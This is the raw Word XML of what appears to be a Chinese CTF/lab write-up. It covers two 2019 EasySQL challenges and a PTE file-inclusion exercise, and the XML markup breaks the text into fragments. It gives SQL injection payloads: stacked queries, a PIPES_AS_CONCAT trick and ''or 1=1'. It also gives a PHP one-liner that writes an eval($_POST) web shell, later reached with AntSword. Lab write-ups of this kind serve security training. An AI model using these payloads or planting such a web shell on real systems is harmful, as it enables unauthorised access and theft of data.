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rPr>
          <w:rFonts w:hint="default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cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>一、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>[SUCTF 2019]EasySQL</w:t>
      </w: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（1）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91B1F"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1;show databases#</w:t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1610" cy="820420"/>
            <wp:effectExtent l="0" t="0" r="1143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82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（2）1;show tables#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pP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74310" cy="725170"/>
            <wp:effectExtent l="0" t="0" r="1397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（3）1;set sql_mode=PIPES_AS_CONCAT;select 2 //这里最后的2,可以写成任意非0值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因为用1;show columns from Flag查看flag里面的内容,但是flag这个字符串被禁用了,就要用其他方式来查看</w:t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4150" cy="816610"/>
            <wp:effectExtent l="0" t="0" r="889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81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二、</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/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>[极客大挑战 2019]EasySQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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（1）我们先来判断一下这里的sql注入</w:t>
      </w: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>类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w: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>输入1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pP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58435" cy="2709545"/>
            <wp:effectExtent l="0" t="0" r="14605" b="31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70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（2）页面没有报错，说明不是数字型sql注入；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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输入1 " 和1’(注意是英文状态下的符号)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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发现只有输入1’时，页面会报错，可判断，报错信息发现是基于单引号的注入。是字符型sql注入；而且报错内容会显示在前端说明是显错型，即数据库后端报错信息会显示在前端页面。</w:t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73040" cy="2718435"/>
            <wp:effectExtent l="0" t="0" r="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1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直接尝试万能密码：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br w:type="textWrapping"/>
      </w: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>’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or 1=1 -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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拿到flag</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5260975" cy="2680970"/>
            <wp:effectExtent l="0" t="0" r="12065" b="12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68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三、</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr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PTE基础题目之文件包含</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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发现存在文件包含</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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http://172.16.12.87/PTE/3.File_Include/vulnerabilities/fu1.php?file=…/key.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w: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>直接读取发现读不到php代码内容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:</w:t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6055" cy="2889885"/>
            <wp:effectExtent l="0" t="0" r="6985" b="571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8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抓包，上传木马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>伪协议写入木马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>&lt;?php fputs(fopen('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a</w:t>
      </w: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>.php','w'),'&lt;?php eval($_POST[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“123”</w:t>
      </w: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>]); ?&gt;'); ?&gt;</w:t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73675" cy="2936240"/>
            <wp:effectExtent l="0" t="0" r="14605" b="508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3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使用蚁剑连接：</w:t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9865" cy="3905250"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1143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看到后台文件，直接获取KEY.PHP文件：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74310" cy="3869690"/>
            <wp:effectExtent l="0" t="0" r="13970" b="127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1819910"/>
            <wp:effectExtent l="0" t="0" r="5715" b="889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1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widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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JhNGU0YTA1MGE2OWE1NWUxNWZjNDcwN2JmZDAxY2YifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="2E415380"/>
    <w:rsid w:val="12BD7227"/>
    <w:rsid w:val="2BCC070B"/>
    <w:rsid w:val="2D1757C6"/>
    <w:rsid w:val="2E415380"/>
    <w:rsid w:val="331D35FA"/>
    <w:rsid w:val="3427268E"/>
    <w:rsid w:val="36D72EDD"/>
    <w:rsid w:val="3E524A9F"/>
    <w:rsid w:val="5D1520D8"/>
    <w:rsid w:val="5EE13EAD"/>
    <w:rsid w:val="6CAB0EF6"/>
    <w:rsid w:val="71D36ECE"/>
    <w:rsid w:val="73CF38B6"/>
    <w:rsid w:val="746F7452"/>
    <w:rsid w:val="7F6F4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2026-04-10T08:27:00Z</dcterms:created>
  <dc:creator>mm</dc:creator>
  <cp:lastModifiedBy>mm</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-10T11:36:38Z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F261119E885C4360AC712B55D997D62E_11</vt:lpwstr>
  </property>
</Properties>
</file>